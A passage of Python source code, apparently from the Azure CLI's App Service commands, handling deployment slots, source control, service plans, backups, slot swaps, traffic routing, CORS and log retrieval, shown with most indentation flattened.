slot_def = Site(server_farm_id=site.server_farm_id, location=location)
slot_def.site_config = SiteConfig()
# if it is a Windows Container site, at least pass the necessary
# app settings to perform the container image validation:
if configuration_source and site_config.windows_fx_version:
# get settings from the source
clone_from_prod = configuration_source.lower() == webapp.lower()
src_slot = None if clone_from_prod else configuration_source
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'list_application_settings', src_slot)
settings = []
for k, v in app_settings.properties.items():
if k in ("DOCKER_REGISTRY_SERVER_USERNAME", "DOCKER_REGISTRY_SERVER_PASSWORD",
"DOCKER_REGISTRY_SERVER_URL"):
settings.append(NameValuePair(name=k, value=v))
slot_def.site_config = SiteConfig(app_settings=settings)
poller = client.web_apps.begin_create_or_update_slot(resource_group_name, webapp, site_envelope=slot_def, slot=slot)
result = LongRunningOperation(cmd.cli_ctx)(poller)
if configuration_source:
update_slot_configuration_from_source(cmd, client, resource_group_name, webapp, slot, configuration_source)
result.name = result.name.split('/')[-1]
return result
def create_functionapp_slot(cmd, resource_group_name, name, slot, configuration_source=None):
Site = cmd.get_models('Site')
client = web_client_factory(cmd.cli_ctx)
site = client.web_apps.get(resource_group_name, name)
if not site:
raise CLIError("'{}' function app doesn't exist".format(name))
location = site.location
slot_def = Site(server_farm_id=site.server_farm_id, location=location)
poller = client.web_apps.begin_create_or_update_slot(resource_group_name, name, site_envelope=slot_def, slot=slot)
result = LongRunningOperation(cmd.cli_ctx)(poller)
if configuration_source:
update_slot_configuration_from_source(cmd, client, resource_group_name, name, slot, configuration_source)
result.name = result.name.split('/')[-1]
return result
def update_slot_configuration_from_source(cmd, client, resource_group_name, webapp, slot, configuration_source=None):
clone_from_prod = configuration_source.lower() == webapp.lower()
site_config = get_site_configs(cmd, resource_group_name, webapp,
None if clone_from_prod else configuration_source)
_generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_configuration', slot, site_config)
# slot create doesn't clone over the app-settings and connection-strings, so we do it here
# also make sure slot settings don't get propagated.
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, webapp)
src_slot = None if clone_from_prod else configuration_source
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'list_application_settings',
src_slot)
for a in slot_cfg_names.app_setting_names or []:
app_settings.properties.pop(a, None)
connection_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'list_connection_strings',
src_slot)
for a in slot_cfg_names.connection_string_names or []:
connection_strings.properties.pop(a, None)
_generic_settings_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_application_settings',
app_settings, slot, client)
_generic_settings_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_connection_strings',
connection_strings, slot, client)
def config_source_control(cmd, resource_group_name, name, repo_url, repository_type='git', branch=None, # pylint: disable=too-many-locals
manual_integration=None, git_token=None, slot=None, github_action=None):
client = web_client_factory(cmd.cli_ctx)
location = _get_location_from_webapp(client, resource_group_name, name)
from azure.mgmt.web.models import SiteSourceControl, SourceControl
if git_token:
sc = SourceControl(location=location, source_control_name='GitHub', token=git_token)
client.update_source_control('GitHub', sc)
source_control = SiteSourceControl(location=location, repo_url=repo_url, branch=branch,
is_manual_integration=manual_integration,
is_mercurial=(repository_type != 'git'), is_git_hub_action=bool(github_action))
# SCC config can fail if previous commands caused SCMSite shutdown, so retry here.
for i in range(5):
try:
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'begin_create_or_update_source_control',
slot, source_control)
return LongRunningOperation(cmd.cli_ctx)(poller)
except Exception as ex: # pylint: disable=broad-except
import re
ex = ex_handler_factory(no_throw=True)(ex)
            # for non-server errors (anything other than 50x), just throw; otherwise retry up to 4 times
if i == 4 or not re.findall(r'\(50\d\)', str(ex)):
raise
logger.warning('retrying %s/4', i + 1)
time.sleep(5) # retry in a moment
def update_git_token(cmd, git_token=None):
    '''
    Update the source control token cached in Azure app service. If no token is provided,
    the command will clear the existing token.
    '''
client = web_client_factory(cmd.cli_ctx)
from azure.mgmt.web.models import SourceControl
sc = SourceControl(name='not-really-needed', source_control_name='GitHub', token=git_token or '')
return client.update_source_control('GitHub', sc)
def show_source_control(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_source_control', slot)
def delete_source_control(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'delete_source_control', slot)
def enable_local_git(cmd, resource_group_name, name, slot=None):
client = web_client_factory(cmd.cli_ctx)
site_config = get_site_configs(cmd, resource_group_name, name, slot)
site_config.scm_type = 'LocalGit'
_generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'create_or_update_configuration', slot, site_config)
return {'url': _get_local_git_url(cmd.cli_ctx, client, resource_group_name, name, slot)}
def sync_site_repo(cmd, resource_group_name, name, slot=None):
try:
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'sync_repository', slot)
except CloudError as ex: # Because of bad spec, sdk throws on 200. We capture it here
if ex.status_code not in [200, 204]:
raise ex
def list_app_service_plans(cmd, resource_group_name=None):
client = web_client_factory(cmd.cli_ctx)
if resource_group_name is None:
plans = list(client.app_service_plans.list(detailed=True)) # enables querying "numberOfSites"
else:
plans = list(client.app_service_plans.list_by_resource_group(resource_group_name))
for plan in plans:
# prune a few useless fields
del plan.geo_region
del plan.subscription
return plans
# TODO use zone_redundant field on ASP model when we switch to SDK version 5.0.0
def _enable_zone_redundant(plan_def, sku_def, number_of_workers):
plan_def.enable_additional_properties_sending()
existing_properties = plan_def.serialize()["properties"]
plan_def.additional_properties["properties"] = existing_properties
plan_def.additional_properties["properties"]["zoneRedundant"] = True
if number_of_workers is None:
sku_def.capacity = 3
else:
sku_def.capacity = max(3, number_of_workers)
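# Note: zone-redundant plans spread instances across availability zones, hence the floor of three
# workers above; a requested capacity below 3 is silently raised to 3.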
def create_app_service_plan(cmd, resource_group_name, name, is_linux, hyper_v, per_site_scaling=False,
app_service_environment=None, sku='B1', number_of_workers=None, location=None,
tags=None, no_wait=False, zone_redundant=False):
HostingEnvironmentProfile, SkuDescription, AppServicePlan = cmd.get_models(
'HostingEnvironmentProfile', 'SkuDescription', 'AppServicePlan')
client = web_client_factory(cmd.cli_ctx)
if app_service_environment:
if hyper_v:
            raise ArgumentUsageError('Windows containers are not yet supported in App Service Environments')
ase_list = client.app_service_environments.list()
ase_found = False
ase = None
for ase in ase_list:
if ase.name.lower() == app_service_environment.lower() or ase.id.lower() == app_service_environment.lower():
ase_def = HostingEnvironmentProfile(id=ase.id)
location = ase.location
ase_found = True
break
if not ase_found:
err_msg = "App service environment '{}' not found in subscription.".format(app_service_environment)
raise ResourceNotFoundError(err_msg)
else: # Non-ASE
ase_def = None
if location is None:
location = _get_location_from_resource_group(cmd.cli_ctx, resource_group_name)
# the api is odd on parameter naming, have to live with it for now
sku_def = SkuDescription(tier=get_sku_tier(sku), name=_normalize_sku(sku), capacity=number_of_workers)
plan_def = AppServicePlan(location=location, tags=tags, sku=sku_def,
reserved=(is_linux or None), hyper_v=(hyper_v or None), name=name,
per_site_scaling=per_site_scaling, hosting_environment_profile=ase_def)
if sku.upper() in ['WS1', 'WS2', 'WS3']:
existing_plan = get_resource_if_exists(client.app_service_plans,
resource_group_name=resource_group_name, name=name)
if existing_plan and existing_plan.sku.tier != "WorkflowStandard":
raise ValidationError("Plan {} in resource group {} already exists and "
"cannot be updated to a logic app SKU (WS1, WS2, or WS3)")
plan_def.type = "elastic"
if zone_redundant:
_enable_zone_redundant(plan_def, sku_def, number_of_workers)
return sdk_no_wait(no_wait, client.app_service_plans.begin_create_or_update, name=name,
resource_group_name=resource_group_name, app_service_plan=plan_def)
def update_app_service_plan(instance, sku=None, number_of_workers=None, elastic_scale=None,
max_elastic_worker_count=None):
if number_of_workers is None and sku is None and elastic_scale is None and max_elastic_worker_count is None:
args = ["--number-of-workers", "--sku", "--elastic-scale", "--max-elastic-worker-count"]
logger.warning('Nothing to update. Set one of the following parameters to make an update: %s', str(args))
sku_def = instance.sku
if sku is not None:
sku = _normalize_sku(sku)
sku_def.tier = get_sku_tier(sku)
sku_def.name = sku
if number_of_workers is not None:
sku_def.capacity = number_of_workers
else:
number_of_workers = sku_def.capacity
if elastic_scale is not None or max_elastic_worker_count is not None:
if sku is None:
sku = instance.sku.name
if get_sku_tier(sku) not in ["PREMIUMV2", "PREMIUMV3"]:
raise ValidationError("--number-of-workers and --elastic-scale can only be used on premium V2/V3 SKUs. "
"Use command help to see all available SKUs")
if elastic_scale is not None:
# TODO use instance.elastic_scale_enabled once the ASP client factories are updated
use_additional_properties(instance)
instance.additional_properties["properties"]["elasticScaleEnabled"] = elastic_scale
if max_elastic_worker_count is not None:
instance.maximum_elastic_worker_count = max_elastic_worker_count
if max_elastic_worker_count < number_of_workers:
raise InvalidArgumentValueError("--max-elastic-worker-count must be greater than or equal to the "
"plan's number of workers. To update the plan's number of workers, use "
"--number-of-workers ")
# TODO use instance.maximum_elastic_worker_count once the ASP client factories are updated
use_additional_properties(instance)
instance.additional_properties["properties"]["maximumElasticWorkerCount"] = max_elastic_worker_count
instance.sku = sku_def
return instance
def show_plan(cmd, resource_group_name, name):
from azure.cli.core.commands.client_factory import get_subscription_id
client = web_client_factory(cmd.cli_ctx)
serverfarm_url_base = 'subscriptions/{}/resourceGroups/{}/providers/Microsoft.Web/serverfarms/{}?api-version={}'
subscription_id = get_subscription_id(cmd.cli_ctx)
serverfarm_url = serverfarm_url_base.format(subscription_id, resource_group_name, name, client.DEFAULT_API_VERSION)
request_url = cmd.cli_ctx.cloud.endpoints.resource_manager + serverfarm_url
response = send_raw_request(cmd.cli_ctx, "GET", request_url)
return response.json()
def update_functionapp_app_service_plan(cmd, instance, sku=None, number_of_workers=None, max_burst=None):
instance = update_app_service_plan(instance, sku, number_of_workers)
if max_burst is not None:
if not is_plan_elastic_premium(cmd, instance):
raise CLIError("Usage error: --max-burst is only supported for Elastic Premium (EP) plans")
max_burst = validate_range_of_int_flag('--max-burst', max_burst, min_val=0, max_val=20)
instance.maximum_elastic_worker_count = max_burst
if number_of_workers is not None:
number_of_workers = validate_range_of_int_flag('--number-of-workers / --min-instances',
number_of_workers, min_val=0, max_val=20)
return update_app_service_plan(instance, sku, number_of_workers)
def show_backup_configuration(cmd, resource_group_name, webapp_name, slot=None):
try:
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'get_backup_configuration', slot)
except Exception: # pylint: disable=broad-except
raise CLIError('Backup configuration not found')
def list_backups(cmd, resource_group_name, webapp_name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'list_backups', slot)
def create_backup(cmd, resource_group_name, webapp_name, storage_account_url,
db_name=None, db_type=None,
db_connection_string=None, backup_name=None, slot=None):
BackupRequest = cmd.get_models('BackupRequest')
client = web_client_factory(cmd.cli_ctx)
if backup_name and backup_name.lower().endswith('.zip'):
backup_name = backup_name[:-4]
db_setting = _create_db_setting(cmd, db_name, db_type=db_type, db_connection_string=db_connection_string)
backup_request = BackupRequest(backup_name=backup_name,
storage_account_url=storage_account_url, databases=db_setting)
if slot:
return client.web_apps.backup_slot(resource_group_name, webapp_name, backup_request, slot)
return client.web_apps.backup(resource_group_name, webapp_name, backup_request)
def update_backup_schedule(cmd, resource_group_name, webapp_name, storage_account_url=None,
frequency=None, keep_at_least_one_backup=None,
retention_period_in_days=None, db_name=None,
db_connection_string=None, db_type=None, backup_name=None, slot=None):
BackupSchedule, BackupRequest = cmd.get_models('BackupSchedule', 'BackupRequest')
configuration = None
if backup_name and backup_name.lower().endswith('.zip'):
backup_name = backup_name[:-4]
if not backup_name:
backup_name = '{0}_{1}'.format(webapp_name, datetime.datetime.utcnow().strftime('%Y%m%d%H%M'))
try:
configuration = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'get_backup_configuration', slot)
except Exception: # pylint: disable=broad-except
# No configuration set yet
if not all([storage_account_url, frequency, retention_period_in_days,
keep_at_least_one_backup]):
raise CLIError('No backup configuration found. A configuration must be created. ' +
'Usage: --container-url URL --frequency TIME --retention DAYS ' +
'--retain-one TRUE/FALSE')
# If arguments were not specified, use the values in the current backup schedule
if storage_account_url is None:
storage_account_url = configuration.storage_account_url
if retention_period_in_days is None:
retention_period_in_days = configuration.backup_schedule.retention_period_in_days
if keep_at_least_one_backup is None:
keep_at_least_one_backup = configuration.backup_schedule.keep_at_least_one_backup
else:
keep_at_least_one_backup = keep_at_least_one_backup.lower() == 'true'
if frequency:
# Parse schedule frequency
frequency_num, frequency_unit = _parse_frequency(cmd, frequency)
else:
frequency_num = configuration.backup_schedule.frequency_interval
frequency_unit = configuration.backup_schedule.frequency_unit
if configuration and configuration.databases:
db = configuration.databases[0]
db_type = db_type or db.database_type
db_name = db_name or db.name
db_connection_string = db_connection_string or db.connection_string
db_setting = _create_db_setting(cmd, db_name, db_type=db_type, db_connection_string=db_connection_string)
backup_schedule = BackupSchedule(frequency_interval=frequency_num, frequency_unit=frequency_unit.name,
keep_at_least_one_backup=keep_at_least_one_backup,
retention_period_in_days=retention_period_in_days)
    backup_request = BackupRequest(backup_name=backup_name, backup_schedule=backup_schedule,
                                   enabled=True, storage_account_url=storage_account_url,
                                   databases=db_setting)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'update_backup_configuration',
slot, backup_request)
def restore_backup(cmd, resource_group_name, webapp_name, storage_account_url, backup_name,
db_name=None, db_type=None, db_connection_string=None,
target_name=None, overwrite=None, ignore_hostname_conflict=None, slot=None):
RestoreRequest = cmd.get_models('RestoreRequest')
client = web_client_factory(cmd.cli_ctx)
storage_blob_name = backup_name
if not storage_blob_name.lower().endswith('.zip'):
storage_blob_name += '.zip'
db_setting = _create_db_setting(cmd, db_name, db_type=db_type, db_connection_string=db_connection_string)
restore_request = RestoreRequest(storage_account_url=storage_account_url,
blob_name=storage_blob_name, overwrite=overwrite,
site_name=target_name, databases=db_setting,
ignore_conflicting_host_names=ignore_hostname_conflict)
if slot:
return client.web_apps.restore_slot(resource_group_name, webapp_name, 0, restore_request, slot)
return client.web_apps.restore(resource_group_name, webapp_name, 0, restore_request)
def list_snapshots(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_snapshots',
slot)
def restore_snapshot(cmd, resource_group_name, name, time, slot=None, restore_content_only=False, # pylint: disable=redefined-outer-name
source_resource_group=None, source_name=None, source_slot=None):
from azure.cli.core.commands.client_factory import get_subscription_id
SnapshotRecoverySource, SnapshotRestoreRequest = cmd.get_models('SnapshotRecoverySource', 'SnapshotRestoreRequest')
client = web_client_factory(cmd.cli_ctx)
recover_config = not restore_content_only
if all([source_resource_group, source_name]):
# Restore from source app to target app
sub_id = get_subscription_id(cmd.cli_ctx)
source_id = "/subscriptions/" + sub_id + "/resourceGroups/" + source_resource_group + \
"/providers/Microsoft.Web/sites/" + source_name
if source_slot:
source_id = source_id + "/slots/" + source_slot
source = SnapshotRecoverySource(id=source_id)
request = SnapshotRestoreRequest(overwrite=False, snapshot_time=time, recovery_source=source,
recover_configuration=recover_config)
if slot:
return client.web_apps.restore_snapshot_slot(resource_group_name, name, request, slot)
return client.web_apps.restore_snapshot(resource_group_name, name, request)
if any([source_resource_group, source_name]):
raise CLIError('usage error: --source-resource-group and --source-name must both be specified if one is used')
# Overwrite app with its own snapshot
request = SnapshotRestoreRequest(overwrite=True, snapshot_time=time, recover_configuration=recover_config)
if slot:
return client.web_apps.restore_snapshot_slot(resource_group_name, name, request, slot)
return client.web_apps.restore_snapshot(resource_group_name, name, request)
# pylint: disable=inconsistent-return-statements
def _create_db_setting(cmd, db_name, db_type, db_connection_string):
DatabaseBackupSetting = cmd.get_models('DatabaseBackupSetting')
if all([db_name, db_type, db_connection_string]):
return [DatabaseBackupSetting(database_type=db_type, name=db_name, connection_string=db_connection_string)]
if any([db_name, db_type, db_connection_string]):
raise CLIError('usage error: --db-name NAME --db-type TYPE --db-connection-string STRING')
def _parse_frequency(cmd, frequency):
FrequencyUnit = cmd.get_models('FrequencyUnit')
unit_part = frequency.lower()[-1]
if unit_part == 'd':
frequency_unit = FrequencyUnit.day
elif unit_part == 'h':
frequency_unit = FrequencyUnit.hour
else:
raise CLIError('Frequency must end with d or h for "day" or "hour"')
try:
frequency_num = int(frequency[:-1])
except ValueError:
raise CLIError('Frequency must start with a number')
    if frequency_num <= 0:
        raise CLIError('Frequency must be positive')
return frequency_num, frequency_unit
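# Illustrative behavior of the parser above (doctest-style; inputs are assumed):
#   _parse_frequency(cmd, '7d')  -> (7, FrequencyUnit.day)
#   _parse_frequency(cmd, '12h') -> (12, FrequencyUnit.hour)
#   _parse_frequency(cmd, '7w')  -> CLIError: frequency must end with d or h
#   _parse_frequency(cmd, 'xd')  -> CLIError: frequency must start with a number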
def _get_deleted_apps_locations(cli_ctx):
client = get_mgmt_service_client(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES)
web_provider = client.providers.get('Microsoft.Web')
del_sites_resource = next((x for x in web_provider.resource_types if x.resource_type == 'deletedSites'), None)
if del_sites_resource:
return del_sites_resource.locations
return []
def _get_local_git_url(cli_ctx, client, resource_group_name, name, slot=None):
user = client.get_publishing_user()
result = _generic_site_operation(cli_ctx, resource_group_name, name, 'get_source_control', slot)
parsed = urlparse(result.repo_url)
return '{}://{}@{}/{}.git'.format(parsed.scheme, user.publishing_user_name,
parsed.netloc, name)
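# For illustration (hypothetical values): with publishing user 'deployer', app name 'myapp',
# and a source-control repo URL of 'https://myapp.scm.azurewebsites.net/myapp.git', the
# function above returns 'https://deployer@myapp.scm.azurewebsites.net/myapp.git'.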
def _get_scm_url(cmd, resource_group_name, name, slot=None):
from azure.mgmt.web.models import HostType
app = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
for host in app.host_name_ssl_states or []:
if host.host_type == HostType.repository:
return "https://{}".format(host.name)
    # this should not happen, but raise anyway
    raise ValueError('Failed to retrieve the SCM URL')
def get_publishing_user(cmd):
client = web_client_factory(cmd.cli_ctx)
return client.get_publishing_user()
def set_deployment_user(cmd, user_name, password=None):
'''
    Update deployment credentials. (Note: all webapps in your subscription will be impacted.)
'''
User = cmd.get_models('User')
client = web_client_factory(cmd.cli_ctx)
user = User(publishing_user_name=user_name)
if password is None:
try:
password = prompt_pass(msg='Password: ', confirm=True)
except NoTTYException:
raise CLIError('Please specify both username and password in non-interactive mode.')
user.publishing_password = password
return client.update_publishing_user(user)
def list_publishing_credentials(cmd, resource_group_name, name, slot=None):
content = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'begin_list_publishing_credentials', slot)
return content.result()
def list_publish_profiles(cmd, resource_group_name, name, slot=None, xml=False):
import xmltodict
content = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_publishing_profile_xml_with_secrets', slot, {"format": "WebDeploy"})
full_xml = ''
for f in content:
full_xml += f.decode()
if not xml:
profiles = xmltodict.parse(full_xml, xml_attribs=True)['publishData']['publishProfile']
converted = []
if not isinstance(profiles, list):
profiles = [profiles]
for profile in profiles:
new = {}
for key in profile:
# strip the leading '@' xmltodict put in for attributes
new[key.lstrip('@')] = profile[key]
converted.append(new)
return converted
cmd.cli_ctx.invocation.data['output'] = 'tsv'
return full_xml
def enable_cd(cmd, resource_group_name, name, enable, slot=None):
settings = []
settings.append("DOCKER_ENABLE_CI=" + enable)
update_app_settings(cmd, resource_group_name, name, settings, slot)
return show_container_cd_url(cmd, resource_group_name, name, slot)
def show_container_cd_url(cmd, resource_group_name, name, slot=None):
settings = get_app_settings(cmd, resource_group_name, name, slot)
docker_enabled = False
for setting in settings:
if setting['name'] == 'DOCKER_ENABLE_CI' and setting['value'] == 'true':
docker_enabled = True
break
cd_settings = {}
cd_settings['DOCKER_ENABLE_CI'] = docker_enabled
if docker_enabled:
credentials = list_publishing_credentials(cmd, resource_group_name, name, slot)
if credentials:
cd_url = credentials.scm_uri + '/docker/hook'
cd_settings['CI_CD_URL'] = cd_url
else:
cd_settings['CI_CD_URL'] = ''
return cd_settings
def view_in_browser(cmd, resource_group_name, name, slot=None, logs=False):
url = _get_url(cmd, resource_group_name, name, slot)
open_page_in_browser(url)
if logs:
get_streaming_log(cmd, resource_group_name, name, provider=None, slot=slot)
def _get_url(cmd, resource_group_name, name, slot=None):
SslState = cmd.get_models('SslState')
site = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not site:
raise CLIError("'{}' app doesn't exist".format(name))
    url = site.enabled_host_names[0]  # picks the custom domain URL in case a domain is assigned
ssl_host = next((h for h in site.host_name_ssl_states
if h.ssl_state != SslState.disabled), None)
return ('https' if ssl_host else 'http') + '://' + url
# TODO: expose new blob support
def config_diagnostics(cmd, resource_group_name, name, level=None,
application_logging=None, web_server_logging=None,
docker_container_logging=None, detailed_error_messages=None,
failed_request_tracing=None, slot=None):
from azure.mgmt.web.models import (FileSystemApplicationLogsConfig, ApplicationLogsConfig,
AzureBlobStorageApplicationLogsConfig, SiteLogsConfig,
HttpLogsConfig, FileSystemHttpLogsConfig,
EnabledConfig)
client = web_client_factory(cmd.cli_ctx)
# TODO: ensure we call get_site only once
site = client.web_apps.get(resource_group_name, name)
if not site:
raise CLIError("'{}' app doesn't exist".format(name))
location = site.location
application_logs = None
if application_logging:
fs_log = None
blob_log = None
level = level if application_logging != 'off' else False
level = True if level is None else level
if application_logging in ['filesystem', 'off']:
fs_log = FileSystemApplicationLogsConfig(level=level)
if application_logging in ['azureblobstorage', 'off']:
blob_log = AzureBlobStorageApplicationLogsConfig(level=level, retention_in_days=3,
sas_url=None)
application_logs = ApplicationLogsConfig(file_system=fs_log,
azure_blob_storage=blob_log)
http_logs = None
server_logging_option = web_server_logging or docker_container_logging
if server_logging_option:
        # TODO: az blob storage log config currently not in use, will be implemented later.
# Tracked as Issue: #4764 on Github
filesystem_log_config = None
turned_on = server_logging_option != 'off'
if server_logging_option in ['filesystem', 'off']:
            # 100 MB max log size, 3-day retention; hard-coded to match the portal defaults
filesystem_log_config = FileSystemHttpLogsConfig(retention_in_mb=100, retention_in_days=3,
enabled=turned_on)
http_logs = HttpLogsConfig(file_system=filesystem_log_config, azure_blob_storage=None)
detailed_error_messages_logs = (None if detailed_error_messages is None
else EnabledConfig(enabled=detailed_error_messages))
failed_request_tracing_logs = (None if failed_request_tracing is None
else EnabledConfig(enabled=failed_request_tracing))
site_log_config = SiteLogsConfig(location=location,
application_logs=application_logs,
http_logs=http_logs,
failed_requests_tracing=failed_request_tracing_logs,
detailed_error_messages=detailed_error_messages_logs)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_diagnostic_logs_config',
slot, site_log_config)
def show_diagnostic_settings(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_diagnostic_logs_configuration', slot)
def show_deployment_log(cmd, resource_group, name, slot=None, deployment_id=None):
import urllib3
import requests
scm_url = _get_scm_url(cmd, resource_group, name, slot)
username, password = _get_site_credential(cmd.cli_ctx, resource_group, name, slot)
headers = urllib3.util.make_headers(basic_auth='{}:{}'.format(username, password))
deployment_log_url = ''
if deployment_id:
deployment_log_url = '{}/api/deployments/{}/log'.format(scm_url, deployment_id)
else:
deployments_url = '{}/api/deployments/'.format(scm_url)
response = requests.get(deployments_url, headers=headers)
if response.status_code != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
deployments_url, response.status_code, response.reason))
sorted_logs = sorted(
response.json(),
key=lambda x: x['start_time'],
reverse=True
)
if sorted_logs and sorted_logs[0]:
deployment_log_url = sorted_logs[0].get('log_url', '')
if deployment_log_url:
response = requests.get(deployment_log_url, headers=headers)
if response.status_code != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
deployment_log_url, response.status_code, response.reason))
return response.json()
return []
def list_deployment_logs(cmd, resource_group, name, slot=None):
scm_url = _get_scm_url(cmd, resource_group, name, slot)
deployment_log_url = '{}/api/deployments/'.format(scm_url)
username, password = _get_site_credential(cmd.cli_ctx, resource_group, name, slot)
import urllib3
headers = urllib3.util.make_headers(basic_auth='{}:{}'.format(username, password))
import requests
response = requests.get(deployment_log_url, headers=headers)
if response.status_code != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
scm_url, response.status_code, response.reason))
return response.json() or []
def config_slot_auto_swap(cmd, resource_group_name, webapp, slot, auto_swap_slot=None, disable=None):
client = web_client_factory(cmd.cli_ctx)
site_config = client.web_apps.get_configuration_slot(resource_group_name, webapp, slot)
site_config.auto_swap_slot_name = '' if disable else (auto_swap_slot or 'production')
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp, 'update_configuration', slot, site_config)
def list_slots(cmd, resource_group_name, webapp):
client = web_client_factory(cmd.cli_ctx)
slots = list(client.web_apps.list_slots(resource_group_name, webapp))
for slot in slots:
slot.name = slot.name.split('/')[-1]
setattr(slot, 'app_service_plan', parse_resource_id(slot.server_farm_id)['name'])
del slot.server_farm_id
return slots
def swap_slot(cmd, resource_group_name, webapp, slot, target_slot=None, preserve_vnet=None, action='swap'):
client = web_client_factory(cmd.cli_ctx)
    # default isPreserveVnet to 'true' when preserve_vnet is None
    isPreserveVnet = preserve_vnet if preserve_vnet is not None else 'true'
    # conversion from string to boolean
    isPreserveVnet = bool(isPreserveVnet == 'true')
CsmSlotEntity = cmd.get_models('CsmSlotEntity')
slot_swap_entity = CsmSlotEntity(target_slot=target_slot or 'production', preserve_vnet=isPreserveVnet)
if action == 'swap':
poller = client.web_apps.begin_swap_slot(resource_group_name, webapp, slot, slot_swap_entity)
return poller
if action == 'preview':
if slot is None:
result = client.web_apps.apply_slot_config_to_production(resource_group_name, webapp, slot_swap_entity)
else:
result = client.web_apps.apply_slot_configuration_slot(resource_group_name, webapp, slot, slot_swap_entity)
return result
    # reset: restore the slot configuration of the target slot (or production if no target is given)
if target_slot is None:
client.web_apps.reset_production_slot_config(resource_group_name, webapp)
else:
client.web_apps.reset_slot_configuration_slot(resource_group_name, webapp, target_slot)
return None
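# Typical CLI invocations backed by swap_slot (resource and slot names assumed):
#   az webapp deployment slot swap -g rg -n myapp --slot staging                   # swap into production
#   az webapp deployment slot swap -g rg -n myapp --slot staging --action preview  # apply target config only
#   az webapp deployment slot swap -g rg -n myapp --slot staging --action reset    # undo a preview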
def delete_slot(cmd, resource_group_name, webapp, slot):
client = web_client_factory(cmd.cli_ctx)
# TODO: once swagger finalized, expose other parameters like: delete_all_slots, etc...
client.web_apps.delete_slot(resource_group_name, webapp, slot)
def set_traffic_routing(cmd, resource_group_name, name, distribution):
RampUpRule = cmd.get_models('RampUpRule')
client = web_client_factory(cmd.cli_ctx)
site = client.web_apps.get(resource_group_name, name)
if not site:
raise CLIError("'{}' app doesn't exist".format(name))
configs = get_site_configs(cmd, resource_group_name, name)
host_name_split = site.default_host_name.split('.', 1)
host_name_suffix = '.' + host_name_split[1]
host_name_val = host_name_split[0]
configs.experiments.ramp_up_rules = []
for r in distribution:
slot, percentage = r.split('=')
action_host_name_slot = host_name_val + "-" + slot
configs.experiments.ramp_up_rules.append(RampUpRule(action_host_name=action_host_name_slot + host_name_suffix,
reroute_percentage=float(percentage),
name=slot))
_generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', None, configs)
return configs.experiments.ramp_up_rules
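# Illustrative example (assumed names): for an app whose default host name is
# 'myapp.azurewebsites.net', a distribution entry 'staging=25' produces a ramp-up rule
# routing 25% of traffic to the action host 'myapp-staging.azurewebsites.net'.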
def show_traffic_routing(cmd, resource_group_name, name):
configs = get_site_configs(cmd, resource_group_name, name)
return configs.experiments.ramp_up_rules
def clear_traffic_routing(cmd, resource_group_name, name):
set_traffic_routing(cmd, resource_group_name, name, [])
def add_cors(cmd, resource_group_name, name, allowed_origins, slot=None):
from azure.mgmt.web.models import CorsSettings
configs = get_site_configs(cmd, resource_group_name, name, slot)
if not configs.cors:
configs.cors = CorsSettings()
configs.cors.allowed_origins = (configs.cors.allowed_origins or []) + allowed_origins
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
return result.cors
def remove_cors(cmd, resource_group_name, name, allowed_origins, slot=None):
configs = get_site_configs(cmd, resource_group_name, name, slot)
if configs.cors:
if allowed_origins:
configs.cors.allowed_origins = [x for x in (configs.cors.allowed_origins or []) if x not in allowed_origins]
else:
configs.cors.allowed_origins = []
configs = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
return configs.cors
def show_cors(cmd, resource_group_name, name, slot=None):
configs = get_site_configs(cmd, resource_group_name, name, slot)
return configs.cors
def get_streaming_log(cmd, resource_group_name, name, provider=None, slot=None):
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
streaming_url = scm_url + '/logstream'
if provider:
streaming_url += ('/' + provider.lstrip('/'))
user, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
t = threading.Thread(target=_get_log, args=(streaming_url, user, password))
t.daemon = True
t.start()
while True:
time.sleep(100) # so that ctrl+c can stop the command
def download_historical_logs(cmd, resource_group_name, name, log_file=None, slot=None):
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
url = scm_url.rstrip('/') + '/dump'
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
_get_log(url, user_name, password, log_file)
logger.warning('Downloaded logs to %s', log_file)
def _get_site_credential(cli_ctx, resource_group_name, name, slot=None):
creds = _generic_site_operation(cli_ctx, resource_group_name, name, 'begin_list_publishing_credentials', slot)
creds = creds.result()
return (creds.publishing_user_name, creds.publishing_password)
def _get_log(url, user_name, password, log_file=None):
import urllib3
try:
import urllib3.contrib.pyopenssl
